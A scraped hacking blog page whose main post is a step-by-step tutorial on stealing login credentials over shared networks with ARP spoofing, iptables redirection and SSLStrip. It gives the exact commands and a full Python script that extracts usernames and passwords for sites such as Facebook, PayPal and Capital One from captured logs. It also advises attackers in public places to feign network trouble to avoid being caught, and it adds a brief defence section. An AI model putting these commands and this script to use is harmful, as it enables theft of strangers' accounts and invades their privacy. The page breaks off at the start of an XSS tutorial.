I've been using SSLStrip MITM attack a lot recently and decided I am just sick of having to manually configure it so I decided to write a perl script to mostly do it for me or atleast consolidate it in 1 spot. Let me know what you guys think. If anyone notices any bugs let me know so that I can correct them, I've spent the last 2-3hrs testing so it's pretty good from what I can see right now. Nmap option is also included.<br />
<br />
This is not a tutorial of how to do it, that is posted in another location in the intern0t forums.<br />
<br />
Here are the things that are required for this script:<br />
Linux (tested in Ubuntu & Backtrack 4 R2)<br />
Ettercap (specifically etter.conf)<br />
X-term (used b/c Ubuntu & BT4 both have it)<br />
Arpspoof<br />
SSLStrip<br />
Nmap<br />
<br />
**********Start of Disclaimer***********<br />
<div style="text-align: left;">
I'm not responsible for anything illegal or mischievous that you decide to use this for blah, blah, blah...</div>
Don't blame me, I didn't force you to use it.<br />
**********End of Disclaimer************<br />
<br />
<div style="text-align: left;">
Code: <a href="http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz" target="_blank">Download Here.</a></div>
<br />
<br />
Hope this helps everyone, let me know if you have any suggestions. Thanks.<br />
<span style="color: red;">Note:</span> <a href="http://it-2on3.blogspot.com/2011/01/sslstrip-tutorial.html" target="_blank">For further reading.</a><br />
<br />
</div>
</div>

Hacking Hacking Tutorials Linux Tutorials MITM Networking Tutorials Perl Script for SSLStrip MITM Attack

I've been using SSLStrip MITM attack a lot recently and decided I am just sick of having to manually configure it so I decided to w...

Stealing Credentials via MITM Attacks -- ARPSpoof + SSLStrip + IPTables

10/01/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0fP96Sa_SDlnNGs01bCFKC-jkWMGLdC3wZzmuVZJTgreU0IiF2WeE47KpGOtl-gaoNPLNvC7IfUoRUDU-mKiTcAELZmdCxZVhDoeiZ9VabYBKJfTHREkMVbsl1au98e7QXGmsOA7xJGR/s1600/arp+poisoning.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0fP96Sa_SDlnNGs01bCFKC-jkWMGLdC3wZzmuVZJTgreU0IiF2WeE47KpGOtl-gaoNPLNvC7IfUoRUDU-mKiTcAELZmdCxZVhDoeiZ9VabYBKJfTHREkMVbsl1au98e7QXGmsOA7xJGR/s640/arp+poisoning.jpg" width="472" /></a></div>
<br />
<br />
<div class="postbody">
<div class="postrow">
<br />
<div style="margin: 0px; padding: 0px;">
<div id="post_message_12962" style="margin: 0px; padding: 0px;">
Greetings, ladies and gentlemen. Today we'll be learning about a couple of interesting tools and how they can be used to steal data from network users. Specifically, we'll be going after login credentials to various secure sites, such as facebook and capital-one (the credit-card company).<br />
<br />
<span style="color: red;">NOTE: This tutorial is intended to instruct current and up-and-coming pen-testers on methods that can be used to determine security on specific networks which they have permission to attack. Executing this attack without permission is illegal, and I do not personally condone such behavior.</span><br />
<br />
<br />
There is a video that tells you how this attack works, for those of you too impatient to sit and read, but this tutorial will include more specific information which the video does not reveal, as well as a script specifically written to make life simpler when executing this attack.<br />
<br />
The video can be found here: <a href="http://www.hak5.org/hack/strip-out-ssl-security-with-a-man-in-the-middle-attack" style="color: #417394; text-decoration: none;" target="_blank">Hak5 SSLStrip Tutorial</a><br />
<br />
Go ahead, view the video. The rest of the class will wait here patiently until you return.<br />
<br />
...<br />
<br />
Did you watch it? Good. Now let's learn more about it.<br />
<br />
In today's lesson we're going to need the following tools:<br />
<ul style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: disc; margin: 0px; padding: 0px;">A Linux OS (<a href="http://www.backtrack-linux.org/" style="color: #417394; text-decoration: none;" target="_blank">click</a>)</li>
<li style="list-style-position: outside; list-style-type: disc; margin: 0px; padding: 0px;">Arpspoof (<a href="http://arpspoof.sourceforge.net/" style="color: #417394; text-decoration: none;" target="_blank">click</a>)</li>
<li style="list-style-position: outside; list-style-type: disc; margin: 0px; padding: 0px;">IPTables (<a href="http://www.netfilter.org/projects/iptables/index.html" style="color: #417394; text-decoration: none;" target="_blank">click</a>)</li>
<li style="list-style-position: outside; list-style-type: disc; margin: 0px; padding: 0px;">SSLStrip (<a href="http://www.thoughtcrime.org/software/sslstrip/" style="color: #417394; text-decoration: none;" target="_blank">click</a>)</li>
<li style="list-style-position: outside; list-style-type: disc; margin: 0px; padding: 0px;">Netstat (<a href="http://www.netstat.net/" style="color: #417394; text-decoration: none;" target="_blank">click</a>)</li>
</ul>
Each of these requirements might have other requirements of its own, however you can find ALL of these tools (and many more) preinstalled in the BackTrack Linux Distribution (see the link next to "A Linux OS" above).<br />
<br />
So, if you don't have it yet, I highly suggest you go download BackTrack now. Yes, now. Go ahead.<br />
<br />
...<br />
<br />
Got it? Good.<br />
<br />
Now, on to business.<br />
<br />
What we're going to do today is perform a basic Man-In-The-Middle (MITM) attack on the users of our unsuspecting Target Network.<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>What is a Man-In-The-Middle attack?</b></span></span><br />
<br />
I'm glad you asked. Here's a definition from our trusty friend, Wikipedia:<br />
<br />
"In cryptography, a man-in-the-middle attack ... is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker."<br />
<br />
In layman's terms, a MITM attack places the attacker between two unsuspecting targets, allowing him or her to intercept their communications.<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>So how does one perform one of these attacks?</b></span></span><br />
<br />
Good question. There are many ways of performing man-in-the-middle attacks, especially on computer networks. Today we're going to focus on one called "ARP Spoofing" or "ARP Cache Poisoning."<br />
<br />
To understand how this works, I'll give you a little bit of background.<br />
<br />
<b>ARP Spoofing</b> takes advantage of vulnerabilities in the <b>Address Resolution Protocol</b>. This protocol (ARP) basically helps systems on a network determine what IPs are associated with what MAC addresses.<br />
<br />
When a computer connects to a network, it needs certain information to allow it to get online. For example, it needs to know the IP of the gateway, where it will route all traffic. But knowing an IP is worthless unless you have a MAC address you can link it to. Without a MAC, an IP is simply a number, and systems won't know which interface or which system to communicate with.<br />
<br />
So, for example, let's say you hook your computer to the local wifi. Here's what happens:<br />
<br />
<ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Your computer will connect to the network, then will ask for the default gateway's MAC address via ARP. (Hi, I'm new here, who owns this place?)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">The router will see the ARP request, and send its MAC address. (Hey! I'm the router. Anything you need, you come to me first.)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">The computer will assign that MAC to the router's IP, and will continue on its merry way.</li>
</ol>
<br />
Thing is, systems don't just ask for the MAC once -- sometimes errors happen, sometimes routing tables change, so it is necessary to occasionally update the ARP tables to make sure they're up-to-date.<br />
<br />
ARP Spoofing allows us to take advantage of this. Here's how that works:<br />
<br />
<ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Your computer asks for the MAC for the gateway. (Hey, haven't seen router around, anyone know where he is? Just want to make sure he's still here.)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">The attacker will step in and claim to be the router. (Hi! I'm the new owner, you can talk to me.)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Your computer will blindly accept this claim! (Oh, cool! Nice to meet you!)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Meanwhile, when the real router shows up, the attacker's system will pretend to be your computer. (Hey! How's it going? So-and-so asked me to take his place, so if you don't mind, you can talk through me.)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">The router will also blindly accept this claim. (Cool, cool. Let him know I said hi!)</li>
</ol>
<br />
At this point, the attacker's computer has tricked the victim into thinking that it is actually the router, and has tricked the router into thinking it is the victim! So now, when the victim and router decide to talk, they end up speaking with you instead, allowing you to know everything they're saying (and change it up).<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>So how do I become the man-in-the-middle?</b></span></span><br />
<br />
I'm getting to that! Be patient!<br />
<br />
So in order to use ARP poisoning to become the MITM, you would need to perform the following steps:<br />
<br />
<ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Set up port-forwarding on your Linux box. <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">echo '1' > /proc/sys/net/ipv4/ip_forward</pre>
</div>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">This tells your computer to forward any packets that weren't intended for your machine.</li>
</ol>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Find out which system on your network is the gateway (e.g. router). <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">netstat -nr</pre>
</div>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">This will inform you about which IP belongs to the gateway. Usually it's something like 192.168.1.1.</li>
</ol>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Use ARP Spoof to put yourself between the router and all other systems on the network. <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">arpspoof -i wlan0 192.168.1.1</pre>
</div>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">You will need to change "wlan0" to reference whatever device is currently connected to the network -- usually eth0 or wlan0.</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">You will need to change "192.168.1.1" to the IP of the gateway through which your system connects. (See step 2.)</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">If you watched the Hak5 video above, you'll notice that we didn't define a target via the "-t" option. In the Hak5 video, they were attacking a specific target. In THIS tutorial, we're attacking the entire network.</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><span style="color: red;"><b>NOTE: Under heavy loads, using arpspoof on an entire network can cause the network to crash, making the internet unavailable to all users. This makes it pretty obvious that something is up, and sysadmins will be doing what they can to fix the problem. Should this ever occur, stop the arpspoof process using 'ctrl-c' and wait a moment. The network should start working again, once the router informs everyone of its MAC. Then you can start your attack again, if you're so bold. (If you're worried about being caught, e.g. in a library or public place, just pretend like you're having trouble too and most people will ignore you.)</b></span></li>
</ol>
</li>
</ol>
Having executed these steps, you will begin to see ARP Spoof actively rerouting all traffic through your system. You have now successfully become the Man in the Middle!<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>But how do I take advantage of this position?</b></span></span><br />
<br />
Well, from this point, we can easily use tools like <a href="http://www.wireshark.org/" style="color: #417394; text-decoration: none;" target="_blank">wireshark</a> to sniff all network traffic and see what everyone's up to. Or we can reconfigure our firewall setup to deny access to specific IPs, effectively booting them off the network. Or we could use tools like <a href="http://www.inguardians.com/tools/" style="color: #417394; text-decoration: none;" target="_blank">the middler</a> to actively change the traffic going through the network!<br />
<br />
But we're not going to talk about those tools today -- that would be another tutorial altogether. Today we're going to learn how to use a fun tool called SSL Strip to steal login credentials from users.<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>What is SSL Strip?</b></span></span><br />
<br />
SSL Strip is a tool written by <a href="http://www.thoughtcrime.org/" style="color: #417394; text-decoration: none;" target="_blank">Moxie Marlinspike</a> and released at Black Hat DC 2009. It basically reroutes encrypted HTTPS requests from network users to plaintext HTTP requests, effectively sniffing all credentials passed along the network via SSL. The way it does this is it lets users connect via HTTP, logs their information, then redirects their connection to the originally-intended HTTPS server on the internet.<br />
<br />
This all happens on the fly, and is practically invisible to users. The only way to notice is by checking the URL in the address bar: where normally it would display HTTPS, it will now display HTTP instead. (But on some sites, like Facebook, Myspace, and many others, the URL will never display HTTPS, so this attack will be impossible to detect by simply checking the URL.)<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>So how do we execute this attack?</b></span></span><br />
<br />
Here's how:<br />
<br />
<ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">First things first -- we need to set up a firewall rule (via iptables) to redirect requests from port 80 to port 8080 -- this will ensure that our outgoing connections (from SSL Strip) get routed to the proper port. <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080</pre>
</div>
</li>
</ol>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Now that we've got our firewall setup, we need to execute the MITM instructions listed earlier. <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 48px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 192.168.1.1</pre>
</div>
</li>
</ol>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">Once arpspoof starts running, open a new terminal and start SSL Strip. <ol class="decimal" style="margin: 1em 1em 1em 2em; padding: 0px;">
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;"><div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">sslstrip -k -l 8080</pre>
</div>
</li>
<li style="list-style-position: outside; list-style-type: decimal; margin: 0px; padding: 0px;">The "-k" designator tells the system to kill all currently active sessions, forcing users to re-login to their websites.</li>
</ol>
</li>
</ol>
Now that we've started our MITM attack and got SSL Strip actively intercepting packets, all we have to do is sit and wait. SSL Strip will run as long as you want it to, and it will log all captured information in a file called sslstrip.log.<br />
<br />
If you want to watch this file as it grows, you can use the 'tail' command. This is a fun tool that helps you watch logfiles as they're modified in real-time.<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">tail -f sslstrip.log</pre>
</div>
The "-f" modifier tells tail to follow the file until you tell it to stop.<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>Sweet! I've intercepted lots of traffic! Now what?</b></span></span><br />
<br />
Once you're done with your attack, use the <b>ctrl-c</b> key combination to kill the 'tail,' 'sslstrip,' and 'arpspoof' processes. The sslstrip.log file will remain, and the system will stop being the MITM.<br />
<br />
<span style="color: red;"><b>NOTE: As soon as the arpspoof process is ended, the network will go down temporarily. This is because arpspoof doesn't automatically repopulate ARP tables with the router's proper MAC, so systems are left in the dark until the router gets around to telling everyone its address. This problem shouldn't last long, but it happens to ALL systems on the network -- so it's best to play along (as if you're having trouble too). Immediately fleeing the premises is a pretty obvious clue that you had something to do with the outage.</b></span><br />
<br />
After shutting down all processes and disconnecting from the network, you can safely go home and analyze the logfile you've made. It might look like a bunch of gobbledygook:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 48px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">2010-06-27 20:38:24,482 SECURE POST Data (<a href="http://login.facebook.com/">login.facebook.com</a>): charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&locale=en_US&email=user%<a href="http://40email.com/">40email.com</a>&pass=password&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=H2cF2</pre>
</div>
But if you look closely, you'll notice that the username and password used to log into the site are there, plain as day!<br />
<br />
Of course, it's not easy parsing through huge files full of this kind of garbage, and often times we encounter sites we don't need to see.<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>What can we do about this problem?</b></span></span><br />
<br />
Well lucky for you, I've already written a tool specifically to parse the sslstrip.log files! Here's the source code (it's in python):<br />
<br />
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="program glow">
<pre><code class="prettyprint">
#!/usr/bin/env python  
##################### # ParseLog.py # # By <a href="mailto:z3ros3c@gmail.com">z3ros3c@gmail.com</a> #####################  """ This file parses the sslstrip.log created by     sslstrip for usernames and passwords (and other     interesting information) defined in the file     resources/definitions.sslstrip. It will also     give you a complete list of all unknown information,     with the exception of anything listed in the file     resources/blacklist.sslstrip. """  from urllib import unquote  
getIP = lambda origin: origin[origin.find('(')+1:origin.find(')')]  blacklist = [] accounts = [] definitions = {}  def getDefs(defs):   d = {}   for definition in defs:     tmp = definition.split('|')     a = tmp.pop(0)     b = tmp.pop()     if('\n' in b):       b = b[:-1]     tmp.append(b)     d[a] = tmp[:]   return d  def getAllVars(line):   while('&&' in line):     line = line.replace('&&','&')   vars = {}   tmp = line.split('&')   for var in tmp:     try:       (a,b) = var.split('=')       if('$' in unquote(a)):         a = unquote(a).split('$').pop()       if('\n' in unquote(b)):         b = unquote(b)[:-1]       vars[unquote(a)] = unquote(b)     except:       pass   return vars  def process(origin,line):   origin = getIP(origin)   if(origin not in blacklist):     vars = getAllVars(line)     if(origin in definitions):       definition = definitions[origin][:]       name = definition.pop(0)       account = "(%s) " % name       for variable in definition:         try:           v = vars[variable]         except:           v = 'UNDEFINED'         account += "%s = %s :: " % (variable,v)       if('UNDEFINED' not in account):         if(account not in accounts):           accounts.append(account)           account += "**NEW**"         print(account)     else:       print("Unknown:\t%s" % origin)       for var in vars:         if(vars[var] != ""):           print("\t%s:\t%s" % (var,vars[var])) try:   lines = open('sslstrip.log','r').readlines() except:   lines = [] try:   blacklist = open('resources/blacklist.sslstrip','r').read().split('\n') except:   print("--blacklist not defined--") try:   accounts = open('accounts.txt','r').read().split('\n') except:   pass try:   definitions = getDefs(open('resources/definitions.sslstrip','r').readlines()) except:   pass  try:   line = lines.pop(0)   while(1):     while('POST' not in line):       try:         line = lines.pop(0)       except:         break     process(line,lines.pop(0))     try:       line = lines.pop(0)     except:       break except:   print("Empty logfile.")  output = open('accounts.txt','w') accounts.sort() for account in accounts:   if(account != ''):     output.write(account + '\n')</code></pre>
</div>
</div>
</div>
</div>
</div>
This script uses a definitions file and a blacklist file (named "definitions.sslstrip" and "blacklist.sslstrip" respectively) to weed out the information you need.<br />
<br />
These files are stored in a subdirectory called "resources".<br />
<br />
Here's what they look like:<br />
(resources/blacklist.sslstrip)<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 156px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;"><a href="http://sup.live.com/">sup.live.com</a> <a href="http://svcs.ebay.com/">svcs.ebay.com</a> <a href="http://toolbar.zynga.com/">toolbar.zynga.com</a> <a href="http://touch.facebook.com/">touch.facebook.com</a> <a href="http://urlcheck.hulu.com/">urlcheck.hulu.com</a> <a href="http://uts.amazon.com/">uts.amazon.com</a> <a href="http://webmail.aol.com/">webmail.aol.com</a> <a href="http://www.adotube.com/">http://www.adotube.com/</a> <a href="http://www.facebook.com/">http://www.facebook.com/</a> <a href="http://www.overstock.com/">http://www.overstock.com/</a> <a href="http://www.slideshare.net/">http://www.slideshare.net/</a></pre>
</div>
Simply add each URL that you wish to ignore, and it'll prevent the script from parsing those URLs.<br />
<br />
(resources/definitions.sslstrip)<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 372px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;"><a href="http://accounts.craigslist.org/">accounts.craigslist.org</a>|CraigsList|inputEmailHandle|inputPassword <a href="http://digg.com/">digg.com</a>|Digg|username|password <a href="http://en.wikipedia.org/">en.wikipedia.org</a>|Wikipedia|wpName|wpPassword <a href="http://en.wordpress.com/">en.wordpress.com</a>|WordPress|log|pwd <a href="http://hi5.com/">hi5.com</a>|Hi5|email|password <a href="http://imgur.com/">imgur.com</a>|Imgur|username|password <a href="http://login.aeriagames.com/">login.aeriagames.com</a>|AeriaGames|edit[name]|edit[pass] <a href="http://login.capitalone.com/">login.capitalone.com</a>|Capital One|user|password <a href="http://login.facebook.com/">login.facebook.com</a>|Facebook|email|pass <a href="http://login.live.com/">login.live.com</a>|Microsoft Live|login|passwd <a href="http://login.photobucket.com/">login.photobucket.com</a>|PhotoBucket|loginForm[usernameemail]|loginForm[password] <a href="http://login.skype.com/">login.skype.com</a>|Skype|username|password <a href="http://login.yahoo.com/">login.yahoo.com</a>|Yahoo!|login|passwd <a href="http://my.screenname.aol.com/">my.screenname.aol.com</a>|AIM|loginId|password <a href="http://my.t-mobile.com/">my.t-mobile.com</a>|T-Mobile|txtMSISDN|txtPassword <a href="http://mysprint.sprint.com/">mysprint.sprint.com</a>|Sprint|USER|PASSWORD <a href="http://secure.imdb.com/">secure.imdb.com</a>|IMDB|login|password <a href="http://secure.imvu.com/">secure.imvu.com</a>|IMVU|avatarname|password <a href="http://secure.meetup.com/">secure.meetup.com</a>|MeetUp|email|password <a href="http://secure.myspace.com/">secure.myspace.com</a>|Myspace|Email_Textbox|Password_Textbox <a href="http://signin.ebay.com/">signin.ebay.com</a>|Ebay|userid|pass <a href="http://slashdot.org/">slashdot.org</a>|Slashdot|unickname|upasswd <a href="http://twitter.com/">twitter.com</a>|Twitter|session[username_or_email]|session[password] <a href="http://us.battle.net/">us.battle.net</a>|BattleNet|accountName|password <a href="http://www.amazon.com/">http://www.amazon.com/</a>|Amazon|email|password <a href="http://www.blogger.com/">http://www.blogger.com/</a>|Blogger|Email|Passwd <a href="http://www.charter.com/">http://www.charter.com/</a>|Charter.com|txtMyAcctV3UserName|txtMyAcctV3Pass|txtHorWideZipCodeV3 <a href="http://www.demonoid.com/">http://www.demonoid.com/</a>|Demonoid|nickname|password <a href="http://www.deviantart.com/">http://www.deviantart.com/</a>|DeviantArt|username|password <a href="http://www.formspring.me/">http://www.formspring.me/</a>|FormSpring|username|password <a href="http://www.friendster.com/">http://www.friendster.com/</a>|Friendster|email|password <a href="http://www.google.com/">http://www.google.com/</a>|Google|Email|Passwd <a href="http://www.linkedin.com/">http://www.linkedin.com/</a>|LinkedIn|session_key|session_password <a href="http://www.mininova.org/">http://www.mininova.org/</a>|MiniNova|name|password <a href="http://www.netflix.com/">http://www.netflix.com/</a>|NetFlix|email|password1 <a href="http://www.paypal.com/">http://www.paypal.com/</a>|PayPal|login_email|login_password <a href="http://www.progressive.com/">http://www.progressive.com/</a>|Progressive|user1|PWDpassword1 <a href="http://www.reddit.com/">http://www.reddit.com/</a>|Reddit|user|passwd <a href="http://www.stumbleupon.com/">http://www.stumbleupon.com/</a>|StumbleUpon|username|password</pre>
</div>
As you can see, each definition is listed in the following manner:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">URL|Name Of Site|username_variable|password_variable|other_variables</pre>
</div>
It's relatively easy to add new definitions as you discover them!<br />
<br />
Once you've got these files set up, all you have to do is put the sslstrip.log file in the same directory as the parselog.py script, then run it.<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">parselog.py | less</pre>
</div>
(I pipe the output to the 'less' so that I can parse the resulting output easier.)<br />
<br />
You'll see output similar to the following:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 36px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">(Facebook) email = <a href="mailto:user@email.com">user@email.com</a> :: pass = password :: **NEW**</pre>
</div>
The script will print all discovered logins (marking new logins as **NEW**) as well as all unknown URLs found. These unknown URLs can be used to help you define new entries for the 'definitions.sslstrip' list.<br />
<br />
All accounts found will be added to a file called 'accounts.txt' for your viewing pleasure, arranged alphabetically by the website they belong to.<br />
<br />
And that's that!<br />
<br />
<span style="font-size: small;"><span style="color: red;"><b>What can I do to prevent this attack from hurting me?</b></span></span><br />
<br />
There's not a whole lot you can do, though there are some defenses outlined <a href="http://en.wikipedia.org/wiki/ARP_spoofing#Defenses" style="color: #417394; text-decoration: none;" target="_blank">here</a>.<br />
<br />
My suggestion is this: If you're ever on a public network, or if your personal wifi is unsecured, don't use that network to log into any of your personal accounts, unless you've got another defense in place.<br />
<br />
One fun trick is to use SSH tunneling to route your traffic. If you've got an account on a secure box out in the internet somewhere (for example, a linux system hosted on the cloud), you can create a SSH tunnel to that box and route your traffic through the tunnel. That way, no matter who is listening in on your connection, all traffic is encrypted and there's little they can do to intercept it.<br />
<br />
Of course, SSH tunneling is a different tutorial for a different day.<br />
<br />
Well, class, I hope this tutorial has been informational and fun for all involved! Take care, and happy hacking!<br />
<div style="color: red;">
<br /></div>
<div>
<span style="color: red;">Note:</span> <a href="http://windowsecurity.com/articles/Understanding-Man-in-the-Middle-Attacks-ARP-Part1.html" target="_blank">For further reading</a>.<br />
        <a href="http://securitymusings.com/article/752/sniffing-networks-part-1-8023-and-mac-addresses" target="_blank">Some extra info abt MITM</a> </div>
</div>

ARP Spoof Hacking Hacking Tutorials MITM SSL Strip Tutorials Stealing Credentials via MITM Attacks -- ARPSpoof + SSLStrip + IPTables

Greetings, ladies and gentlemen. Today we'll be learning about a couple of interesting tools and how they can be used to steal...

XSS Tutorial - From Bug to Vulnerability

9/30/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
